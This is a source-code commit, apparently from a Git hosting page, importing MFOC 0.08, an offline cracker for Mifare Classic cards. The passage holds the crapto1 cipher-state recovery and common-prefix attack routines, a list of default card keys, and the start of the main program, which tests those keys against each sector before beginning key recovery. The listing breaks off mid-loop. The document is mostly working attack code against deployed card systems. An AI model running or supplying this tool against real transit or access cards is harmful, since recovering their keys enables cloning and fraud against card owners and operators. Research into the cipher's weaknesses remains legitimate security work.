forked/mfoc
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Import MFOC 0.08 from http://www.nethemba.com/mfoc.tar.bz2 on 13th Sept 2010

Browse Source
This commit is contained in:
Romuald Conty
2010-09-14 09:34:51 +00:00
commit 532aaf6bc9
24 changed files with 12106 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
src/Makefile.am Normal file
View File

@@ -0,0 +1,7 @@
bin_PROGRAMS = mfoc
# set the include path found by configure
mfoc_SOURCES = mfoc.c crapto1.c crypto1.c
mfoc_LDADD = -lnfc
# dist_man_MANS = mfoc.1

487
src/crapto1.c Normal file
View File

@@ -0,0 +1,487 @@
/* crapto1.c
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1301, US$
Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>
#if !defined LOWMEM && defined __GNUC__
static uint8_t filterlut[1 << 20];
static void __attribute__((constructor)) fill_lut()
{
uint32_t i;
for(i = 0; i < 1 << 20; ++i)
filterlut[i] = filter(i);
}
#define filter(x) (filterlut[(x) & 0xfffff])
#endif
static void quicksort(uint32_t* const start, uint32_t* const stop)
{
uint32_t *it = start + 1, *rit = stop;
if(it > rit)
return;
while(it < rit)
if(*it <= *start)
++it;
else if(*rit > *start)
--rit;
else
*it ^= (*it ^= *rit, *rit ^= *it);
if(*rit >= *start)
--rit;
if(rit != start)
*rit ^= (*rit ^= *start, *start ^= *rit);
quicksort(start, rit - 1);
quicksort(rit + 1, stop);
}
/** binsearch
* Binary search for the first occurence of *stop's MSB in sorted [start,stop]
*/
static inline uint32_t*
binsearch(uint32_t *start, uint32_t *stop)
{
uint32_t mid, val = *stop & 0xff000000;
while(start != stop)
if(start[mid = (stop - start) >> 1] > val)
stop = &start[mid];
else
start += mid + 1;
return start;
}
/** update_contribution
* helper, calculates the partial linear feedback contributions and puts in MSB
*/
static inline void
update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2)
{
uint32_t p = *item >> 25;
p = p << 1 | parity(*item & mask1);
p = p << 1 | parity(*item & mask2);
*item = p << 24 | (*item & 0xffffff);
}
/** extend_table
* using a bit of the keystream extend the table of possible lfsr states
*/
static inline void
extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in)
{
in <<= 24;
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
if(filter(*tbl) ^ filter(*tbl | 1)) {
*tbl |= filter(*tbl) ^ bit;
update_contribution(tbl, m1, m2);
*tbl ^= in;
} else if(filter(*tbl) == bit) {
*++*end = tbl[1];
tbl[1] = tbl[0] | 1;
update_contribution(tbl, m1, m2);
*tbl++ ^= in;
update_contribution(tbl, m1, m2);
*tbl ^= in;
} else
*tbl-- = *(*end)--;
}
/** extend_table_simple
* using a bit of the keystream extend the table of possible lfsr states
*/
static inline void
extend_table_simple(uint32_t *tbl, uint32_t **end, int bit)
{
for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
if(filter(*tbl) ^ filter(*tbl | 1)) {
*tbl |= filter(*tbl) ^ bit;
} else if(filter(*tbl) == bit) {
*++*end = *++tbl;
*tbl = tbl[-1] | 1;
} else
*tbl-- = *(*end)--;
}
/** recover
* recursively narrow down the search space, 4 bits of keystream at a time
*/
static struct Crypto1State*
recover(uint32_t *o_head, uint32_t *o_tail, uint32_t oks,
uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem,
struct Crypto1State *sl, uint32_t in)
{
uint32_t *o, *e, i;
if(rem == -1) {
for(e = e_head; e <= e_tail; ++e) {
*e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4);
for(o = o_head; o <= o_tail; ++o, ++sl) {
sl->even = *o;
sl->odd = *e ^ parity(*o & LF_POLY_ODD);
sl[1].odd = sl[1].even = 0;
}
}
return sl;
}
for(i = 0; i < 4 && rem--; i++) {
extend_table(o_head, &o_tail, (oks >>= 1) & 1,
LF_POLY_EVEN << 1 | 1, LF_POLY_ODD << 1, 0);
if(o_head > o_tail)
return sl;
extend_table(e_head, &e_tail, (eks >>= 1) & 1,
LF_POLY_ODD, LF_POLY_EVEN << 1 | 1, (in >>= 2) & 3);
if(e_head > e_tail)
return sl;
}
quicksort(o_head, o_tail);
quicksort(e_head, e_tail);
while(o_tail >= o_head && e_tail >= e_head)
if(((*o_tail ^ *e_tail) >> 24) == 0) {
o_tail = binsearch(o_head, o = o_tail);
e_tail = binsearch(e_head, e = e_tail);
sl = recover(o_tail--, o, oks,
e_tail--, e, eks, rem, sl, in);
}
else if(*o_tail > *e_tail)
o_tail = binsearch(o_head, o_tail) - 1;
else
e_tail = binsearch(e_head, e_tail) - 1;
return sl;
}
/** lfsr_recovery
* recover the state of the lfsr given 32 bits of the keystream
* additionally you can use the in parameter to specify the value
* that was fed into the lfsr at the time the keystream was generated
*/
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in)
{
struct Crypto1State *statelist;
uint32_t *odd_head = 0, *odd_tail = 0, oks = 0;
uint32_t *even_head = 0, *even_tail = 0, eks = 0;
int i;
for(i = 31; i >= 0; i -= 2)
oks = oks << 1 | BEBIT(ks2, i);
for(i = 30; i >= 0; i -= 2)
eks = eks << 1 | BEBIT(ks2, i);
odd_head = odd_tail = malloc(sizeof(uint32_t) << 21);
even_head = even_tail = malloc(sizeof(uint32_t) << 21);
statelist = malloc(sizeof(struct Crypto1State) << 18);
if(!odd_tail-- || !even_tail-- || !statelist)
goto out;
statelist->odd = statelist->even = 0;
for(i = 1 << 20; i >= 0; --i) {
if(filter(i) == (oks & 1))
*++odd_tail = i;
if(filter(i) == (eks & 1))
*++even_tail = i;
}
for(i = 0; i < 4; i++) {
extend_table_simple(odd_head, &odd_tail, (oks >>= 1) & 1);
extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1);
}
in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00);
recover(odd_head, odd_tail, oks,
even_head, even_tail, eks, 11, statelist, in << 1);
out:
free(odd_head);
free(even_head);
return statelist;
}
static const uint32_t S1[] = { 0x62141, 0x310A0, 0x18850, 0x0C428, 0x06214,
0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83,
0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA};
static const uint32_t S2[] = { 0x3A557B00, 0x5D2ABD80, 0x2E955EC0, 0x174AAF60,
0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8,
0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20,
0x7EC7EE90, 0x7F63F748, 0x79117020};
static const uint32_t T1[] = {
0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66,
0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B,
0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615,
0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C};
static const uint32_t T2[] = { 0x3C88B810, 0x5E445C08, 0x2982A580, 0x14C152C0,
0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268,
0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0,
0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0,
0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950,
0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0};
static const uint32_t C1[] = { 0x846B5, 0x4235A, 0x211AD};
static const uint32_t C2[] = { 0x1A822E0, 0x21A822E0, 0x21A822E0};
/** Reverse 64 bits of keystream into possible cipher states
* Variation mentioned in the paper. Somewhat optimized version
*/
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3)
{
struct Crypto1State *statelist, *sl;
uint8_t oks[32], eks[32], hi[32];
uint32_t low = 0, win = 0;
uint32_t *tail, table[1 << 16];
int i, j;
sl = statelist = malloc(sizeof(struct Crypto1State) << 4);
if(!sl)
return 0;
sl->odd = sl->even = 0;
for(i = 30; i >= 0; i -= 2) {
oks[i >> 1] = BIT(ks2, i ^ 24);
oks[16 + (i >> 1)] = BIT(ks3, i ^ 24);
}
for(i = 31; i >= 0; i -= 2) {
eks[i >> 1] = BIT(ks2, i ^ 24);
eks[16 + (i >> 1)] = BIT(ks3, i ^ 24);
}
for(i = 0xfffff; i >= 0; --i) {
if (filter(i) != oks[0])
continue;
*(tail = table) = i;
for(j = 1; tail >= table && j < 29; ++j)
extend_table_simple(table, &tail, oks[j]);
if(tail < table)
continue;
for(j = 0; j < 19; ++j)
low = low << 1 | parity(i & S1[j]);
for(j = 0; j < 32; ++j)
hi[j] = parity(i & T1[j]);
for(; tail >= table; --tail) {
for(j = 0; j < 3; ++j) {
*tail = *tail << 1;
*tail |= parity((i & C1[j]) ^ (*tail & C2[j]));
if(filter(*tail) != oks[29 + j])
goto continue2;
}
for(j = 0; j < 19; ++j)
win = win << 1 | parity(*tail & S2[j]);
win ^= low;
for(j = 0; j < 32; ++j) {
win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]);
if(filter(win) != eks[j])
goto continue2;
}
*tail = *tail << 1 | parity(LF_POLY_EVEN & *tail);
sl->odd = *tail ^ parity(LF_POLY_ODD & win);
sl->even = win;
++sl;
sl->odd = sl->even = 0;
continue2:;
}
}
return statelist;
}
/** lfsr_rollback_bit
* Rollback the shift register in order to get previous states
*/
uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb)
{
int out;
uint8_t ret;
s->odd &= 0xffffff;
s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);
out = s->even & 1;
out ^= LF_POLY_EVEN & (s->even >>= 1);
out ^= LF_POLY_ODD & s->odd;
out ^= !!in;
out ^= (ret = filter(s->odd)) & !!fb;
s->even |= parity(out) << 23;
return ret;
}
/** lfsr_rollback_byte
* Rollback the shift register in order to get previous states
*/
uint8_t lfsr_rollback_byte(struct Crypto1State *s, uint32_t in, int fb)
{
int i;
uint8_t ret = 0;
for (i = 7; i >= 0; --i)
ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i;
return ret;
}
/** lfsr_rollback_word
* Rollback the shift register in order to get previous states
*/
uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb)
{
int i;
uint32_t ret = 0;
for (i = 31; i >= 0; --i)
ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24);
return ret;
}
/** nonce_distance
* x,y valid tag nonces, then prng_successor(x, nonce_distance(x, y)) = y
*/
static uint16_t *dist = 0;
int nonce_distance(uint32_t from, uint32_t to)
{
uint16_t x, i;
if(!dist) {
dist = malloc(2 << 16);
if(!dist)
return -1;
for (x = i = 1; i; ++i) {
dist[(x & 0xff) << 8 | x >> 8] = i;
x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
}
}
return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535;
}
static uint32_t fastfwd[2][8] = {
{ 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB},
{ 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980}};
/** lfsr_prefix_ks
*
* Is an exported helper function from the common prefix attack
* Described in the "dark side" paper. It returns an -1 terminated array
* of possible partial(21 bit) secret state.
* The required keystream(ks) needs to contain the keystream that was used to
* encrypt the NACK which is observed when varying only the 4 last bits of Nr
* only correct iff [NR_3] ^ NR_3 does not depend on Nr_3
*/
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd)
{
uint32_t c, entry, *candidates = malloc(4 << 21);
int i, size = (1 << 21) - 1;
if(!candidates)
return 0;
for(i = 0; i <= size; ++i)
candidates[i] = i;
for(c = 0; c < 8; ++c)
for(i = 0;i <= size; ++i) {
entry = candidates[i] ^ fastfwd[isodd][c];
if(filter(entry >> 1) != BIT(ks[c], isodd) ||
filter(entry) != BIT(ks[c], isodd + 2))
candidates[i--] = candidates[size--];
}
candidates[size + 1] = -1;
return candidates;
}
/** check_pfx_parity
* helper function which eliminates possible secret states using parity bits
*/
static struct Crypto1State*
check_pfx_parity(uint32_t prefix, uint32_t rresp, uint8_t parities[8][8],
uint32_t odd, uint32_t even, struct Crypto1State* sl)
{
uint32_t ks1, nr, ks2, rr, ks3, c, good = 1;
for(c = 0; good && c < 8; ++c) {
sl->odd = odd ^ fastfwd[1][c];
sl->even = even ^ fastfwd[0][c];
lfsr_rollback_bit(sl, 0, 0);
lfsr_rollback_bit(sl, 0, 0);
ks3 = lfsr_rollback_bit(sl, 0, 0);
ks2 = lfsr_rollback_word(sl, 0, 0);
ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1);
nr = ks1 ^ (prefix | c << 5);
rr = ks2 ^ rresp;
good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24);
good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16);
good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2, 8);
good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2, 0);
good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3;
}
return sl + good;
}
/** lfsr_common_prefix
* Implentation of the common prefix attack.
* Requires the 29 bit constant prefix used as reader nonce (pfx)
* The reader response used (rr)
* The keystream used to encrypt the observed NACK's (ks)
* The parity bits (par)
* It returns a zero terminated list of possible cipher states after the
* tag nonce was fed in
*/
struct Crypto1State*
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8])
{
struct Crypto1State *statelist, *s;
uint32_t *odd, *even, *o, *e, top;
odd = lfsr_prefix_ks(ks, 1);
even = lfsr_prefix_ks(ks, 0);
s = statelist = malloc((sizeof *statelist) << 20);
if(!s || !odd || !even) {
free(odd);
free(even);
free(statelist);
return 0;
}
for(o = odd; *o + 1; ++o)
for(e = even; *e + 1; ++e)
for(top = 0; top < 64; ++top) {
*o += 1 << 21;
*e += (!(top & 7) + 1) << 21;
s = check_pfx_parity(pfx, rr, par, *o, *e, s);
}
s->odd = s->even = 0;
free(odd);
free(even);
return statelist;
}

88
src/crapto1.h Normal file
View File

@@ -0,0 +1,88 @@
/* crapto1.h
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, US$
Copyright (C) 2008-2009 bla <blapost@gmail.com>
*/
#ifndef CRAPTO1_INCLUDED
#define CRAPTO1_INCLUDED
#include <stdint.h>
#ifdef __cplusplus
extern "C" {
#endif
struct Crypto1State {uint32_t odd, even;};
struct Crypto1State* crypto1_create(uint64_t);
void crypto1_destroy(struct Crypto1State*);
void crypto1_get_lfsr(struct Crypto1State*, uint64_t*);
uint8_t crypto1_bit(struct Crypto1State*, uint8_t, int);
uint8_t crypto1_byte(struct Crypto1State*, uint8_t, int);
uint32_t crypto1_word(struct Crypto1State*, uint32_t, int);
uint32_t prng_successor(uint32_t x, uint32_t n);
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in);
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3);
void lfsr_rollback(struct Crypto1State* s, uint32_t in, int fb);
int nonce_distance(uint32_t from, uint32_t to);
#define FOREACH_VALID_NONCE(N, FILTER, FSIZE)\
uint32_t __n = 0,__M = 0, N = 0;\
int __i;\
for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\
for(__i = FSIZE - 1; __i >= 0; __i--)\
if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\
break;\
else if(__i)\
__M = prng_successor(__M, (__i == 7) ? 48 : 8);\
else
#define LF_POLY_ODD (0x29CE5C)
#define LF_POLY_EVEN (0x870804)
#define BIT(x, n) ((x) >> (n) & 1)
#define BEBIT(x, n) BIT(x, (n) ^ 24)
static inline int parity(uint32_t x)
{
#if !defined __i386__ || !defined __GNUC__
x ^= x >> 16;
x ^= x >> 8;
x ^= x >> 4;
return BIT(0x6996, x & 0xf);
#else
asm( "movl %1, %%eax\n"
"mov %%ax, %%cx\n"
"shrl $0x10, %%eax\n"
"xor %%ax, %%cx\n"
"xor %%ch, %%cl\n"
"setpo %%al\n"
"movzx %%al, %0\n": "=r"(x) : "r"(x): "eax","ecx");
return x;
#endif
}
static inline int filter(uint32_t const x)
{
uint32_t f;
f = 0xf22c0 >> (x & 0xf) & 16;
f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8;
f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4;
f |= 0x1e458 >> (x >> 12 & 0xf) & 2;
f |= 0x0d938 >> (x >> 16 & 0xf) & 1;
return BIT(0xEC57E80A, f);
}
#ifdef __cplusplus
}
#endif
#endif

93
src/crypto1.c Normal file
View File

@@ -0,0 +1,93 @@
/* crypto1.c
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, US
Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>
#define SWAPENDIAN(x)\
(x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16)
struct Crypto1State * crypto1_create(uint64_t key)
{
struct Crypto1State *s = malloc(sizeof(*s));
int i;
for(i = 47;s && i > 0; i -= 2) {
s->odd = s->odd << 1 | BIT(key, (i - 1) ^ 7);
s->even = s->even << 1 | BIT(key, i ^ 7);
}
return s;
}
void crypto1_destroy(struct Crypto1State *state)
{
free(state);
}
void crypto1_get_lfsr(struct Crypto1State *state, uint64_t *lfsr)
{
int i;
for(*lfsr = 0, i = 23; i >= 0; --i) {
*lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3);
*lfsr = *lfsr << 1 | BIT(state->even, i ^ 3);
}
}
uint8_t crypto1_bit(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
uint32_t feedin;
uint8_t ret = filter(s->odd);
feedin = ret & !!is_encrypted;
feedin ^= !!in;
feedin ^= LF_POLY_ODD & s->odd;
feedin ^= LF_POLY_EVEN & s->even;
s->even = s->even << 1 | parity(feedin);
s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);
return ret;
}
uint8_t crypto1_byte(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
uint8_t i, ret = 0;
for (i = 0; i < 8; ++i)
ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i;
return ret;
}
uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted)
{
uint32_t i, ret = 0;
for (i = 0; i < 32; ++i)
ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);
return ret;
}
/* prng_successor
* helper used to obscure the keystream during authentication
*/
uint32_t prng_successor(uint32_t x, uint32_t n)
{
SWAPENDIAN(x);
while(n--)
x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31;
return SWAPENDIAN(x);
}

852
src/mfoc.c Normal file
View File

@@ -0,0 +1,852 @@
/*
Mifare Classic Offline Cracker version 0.08
Requirements: crapto1 library http://code.google.com/p/crapto1
libnfc http://www.libnfc.org
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Contact: <mifare@nethemba.com>
Porting to libnfc 1.3.3: Michal Boska <boska.michal@gmail.com>
URL http://eprint.iacr.org/2009/137.pdf
URL http://www.sos.cs.ru.nl/applications/rfid/2008-esorics.pdf
URL http://www.cosic.esat.kuleuven.be/rfidsec09/Papers/mifare_courtois_rfidsec09.pdf
URL http://www.cs.ru.nl/~petervr/papers/grvw_2009_pickpocket.pdf
*/
#ifndef PACKAGE_STRING
#define PACKAGE_STRING "0.08"
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <nfc/nfc.h>
#include <nfc/mifaretag.h>
#include "crapto1.h"
#include "mfoc.h"
int main(int argc, char * const argv[]) {
int ch, i, k, n, j, m, o;
int key, block;
int succeed = 1;
// Exploit sector
int e_sector;
int probes = DEFAULT_PROBES_NR;
int sets = DEFAULT_SETS_NR;
// By default, dump 'A' keys
int dumpKeysA = true;
bool failure = false;
bool skip = false;
// Next default key specified as option (-k)
byte_t * defKey = NULL;
// Array with default Mifare Classic keys
byte_t defaultKeys[][6] = {
{0xff, 0xff, 0xff, 0xff, 0xff, 0xff}, // First key
{0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5}, // Second key
{0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5}, // Third key
{0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
{0x4d, 0x3a, 0x99, 0xc3, 0x51, 0xdd},
{0x1a, 0x98, 0x2c, 0x7e, 0x45, 0x9a},
{0xd3, 0xf7, 0xd3, 0xf7, 0xd3, 0xf7},
{0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff},
{0x71, 0x4c, 0x5c, 0x88, 0x6e, 0x97},
{0x58, 0x7e, 0xe5, 0xf9, 0x35, 0x0f},
{0xa0, 0x47, 0x8c, 0xc3, 0x90, 0x91},
{0x53, 0x3c, 0xb6, 0xc7, 0x23, 0xf6},
{0x8f, 0xd0, 0xa4, 0xf2, 0x56, 0xe9}
};
mftag t;
mfreader r;
denonce d = {NULL, 0, DEFAULT_DIST_NR, DEFAULT_TOLERANCE, {0x00, 0x00, 0x00}};
// Pointers to possible keys
pKeys *pk;
countKeys *ck;
// Pointer to already broken keys, except defaults
bKeys *bk;
static mifare_param mp;
static mifare_tag mtDump;
mifare_cmd mc;
FILE *pfDump = NULL;
// Parse command line arguments
while ((ch = getopt(argc, argv, "hD:s:BP:T:S:O:k:t:")) != -1) {
switch (ch) {
case 'P':
// Number of probes
if (!(probes = atoi(optarg)) || probes < 1) {
fprintf(stderr, "The number of probes must be a positive number\n");
exit(1);
}
// fprintf(stdout, "Number of probes: %d\n", probes);
break;
case 'T':
// Nonce tolerance range
if (!(d.tolerance = atoi(optarg)) || d.tolerance < 0) {
fprintf(stderr, "The nonce distances range must be a zero or a positive number\n");
exit(1);
}
// fprintf(stdout, "Tolerance number: %d\n", probes);
break;
case 'k':
// Add this key to the default keys list
if ((defKey = calloc(6, sizeof(byte_t))) == NULL) {
fprintf(stderr, "Cannot allocate memory for defKey\n");
exit(1);
} else {
bzero(defKey, 6);
num_to_bytes(strtol(optarg, NULL, 16), 6, defKey);
memcpy(defaultKeys[0], defKey, 6);
}
fprintf(stdout, "The custom key 0x%012llx has been added to the default keys\n", bytes_to_num(defKey, 6));
break;
case 'O':
// File output
if (!(pfDump = fopen(optarg, "wb"))) {
fprintf(stderr, "Cannot open: %s, exiting\n", optarg);
exit(1);
}
// fprintf(stdout, "Output file: %s\n", optarg);
break;
case 'h':
usage(stdout, 0);
break;
default:
usage(stderr, 1);
break;
}
}
if (!pfDump) {
fprintf(stderr, "Error, parameter -O is mandatory\n");
exit(1);
}
// Initialize reader/tag structures
mf_init(&t, &r);
// Configure reader settings
mf_configure(r.pdi);
mf_select_tag(r.pdi, &t.ti);
// Save tag uid and info about block size (b4K)
t.b4K = (t.ti.nai.abtAtqa[1] == 0x02);
t.uid = (uint32_t) bytes_to_num(t.ti.nai.abtUid, 4);
t.num_blocks = (t.b4K) ? 0xff : 0x3f;
t.num_sectors = t.b4K ? NR_TRAILERS_4k : NR_TRAILERS_1k;
t.sectors = (void *) calloc(t.num_sectors, sizeof(sector));
if (t.sectors == NULL) {
fprintf(stderr, "Cannot allocate memory for t.sectors\n");
exit(1);
}
if ((pk = (void *) malloc(sizeof(pKeys))) == NULL) {
fprintf(stderr, "Cannot allocate memory for pk\n");
exit(1);
}
if ((bk = (void *) malloc(sizeof(bKeys))) == NULL) {
fprintf(stderr, "Cannot allocate memory for bk\n");
exit(1);
} else {
bk->brokenKeys = NULL;
bk->size = 0;
}
d.distances = (void *) calloc(d.num_distances, sizeof(u_int32_t));
if (d.distances == NULL) {
fprintf(stderr, "Cannot allocate memory for t.distances\n");
exit(1);
}
// Test if a compatible MIFARE tag is used
if ((t.ti.nai.btSak & 0x08) == 0) {
printf("Error: inserted tag is not a MIFARE Classic card\n");
nfc_disconnect(r.pdi);
exit(1);
}
// Initialize t.sectors, keys are not known yet
for (i = 0; i < (t.num_sectors); ++i) {
t.sectors[i].foundKeyA = t.sectors[i].foundKeyB = false;
}
fprintf(stdout, "Found MIFARE Classic %cK card with uid: %08x\n", (t.b4K ? '4' : '1'), t.uid);
// Try to authenticate to all sectors with default keys
// Set the authentication information (uid)
memcpy(mp.mpa.abtUid, t.ti.nai.abtUid, sizeof(mp.mpa.abtUid));
// Iterate over all keys (n = number of keys)
n = sizeof(defaultKeys)/sizeof(defaultKeys[0]);
for (key = 0; key < n; key++) {
if (key == 0 && defKey == NULL) ++key; // Custom key not provided, try another key
memcpy(mp.mpa.abtKey, defaultKeys[key], sizeof(mp.mpa.abtKey));
fprintf(stdout, "[Key: %012llx] -> ", bytes_to_num(mp.mpa.abtKey, 6));
fprintf(stdout, "[");
i = 0; // Sector counter
// Iterate over every block, where we haven't found a key yet
for (block = 0; block <= t.num_blocks; ++block) {
if (trailer_block(block)) {
if (!t.sectors[i].foundKeyA) {
mc = MC_AUTH_A;
if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) {
// fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x\n",
// bytes_to_num(mp.mpa.abtKey, 6), i, block);
mf_anticollision(t, r);
} else {
// Save all information about successfull keyA authentization
memcpy(t.sectors[i].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[i].foundKeyA = true;
}
}
if (!t.sectors[i].foundKeyB) {
mc = MC_AUTH_B;
if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) {
// fprintf(stdout, "!!Error: AUTH [Key B:%012llx] sector %02x t_block %02x\n",
// bytes_to_num(mp.mpa.abtKey, 6), i, block);
mf_anticollision(t, r);
// No success, try next block
t.sectors[i].trailer = block;
} else {
memcpy(t.sectors[i].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[i].foundKeyB = true;
}
}
if ((t.sectors[i].foundKeyA) || (t.sectors[i].foundKeyB)) {
fprintf(stdout, "x");
} else {
fprintf(stdout, ".");
}
fflush(stdout);
mf_configure(r.pdi);
mf_anticollision(t, r);
// fprintf(stdout, "\nSuccess: AUTH [Key %c:%012llx] sector %02x t_block %02x\n",
// (mc == MC_AUTH_A ? 'A' :'B'), bytes_to_num(mp.mpa.abtKey, 6), i, block);
// Save position of a trailer block to sector struct
t.sectors[i++].trailer = block;
}
}
fprintf(stdout, "]\n");
}
fprintf(stdout, "\n");
for (i = 0; i < (t.num_sectors); ++i) {
fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyA) ? " FOUND_KEY [A]" : " UNKNOWN_KEY [A]"));
fprintf(stdout, "Sector %02d - %12s ", i, ((t.sectors[i].foundKeyB) ? " FOUND_KEY [B]" : " UNKNOWN_KEY [B]"));
fprintf(stdout, "\n");
}
fflush(stdout);
// Return the first (exploit) sector encrypted with the default key or -1 (we have all keys)
e_sector = find_exploit_sector(t);
//mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd'); // AUTH + Get Distances mode
// Recover key from encrypted sectors, j is a sector counter
for (m = 0; m < 2; ++m) {
if (e_sector == -1) break; // All keys are default, I am skipping recovery mode
for (j = 0; j < (t.num_sectors); ++j) {
memcpy(mp.mpa.abtUid, t.ti.nai.abtUid, sizeof(mp.mpa.abtUid));
if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) {
// First, try already broken keys
skip = false;
for (o = 0; o < bk->size; o++) {
num_to_bytes(bk->brokenKeys[o], 6, mp.mpa.abtKey);
mc = dumpKeysA ? 0x60 : 0x61;
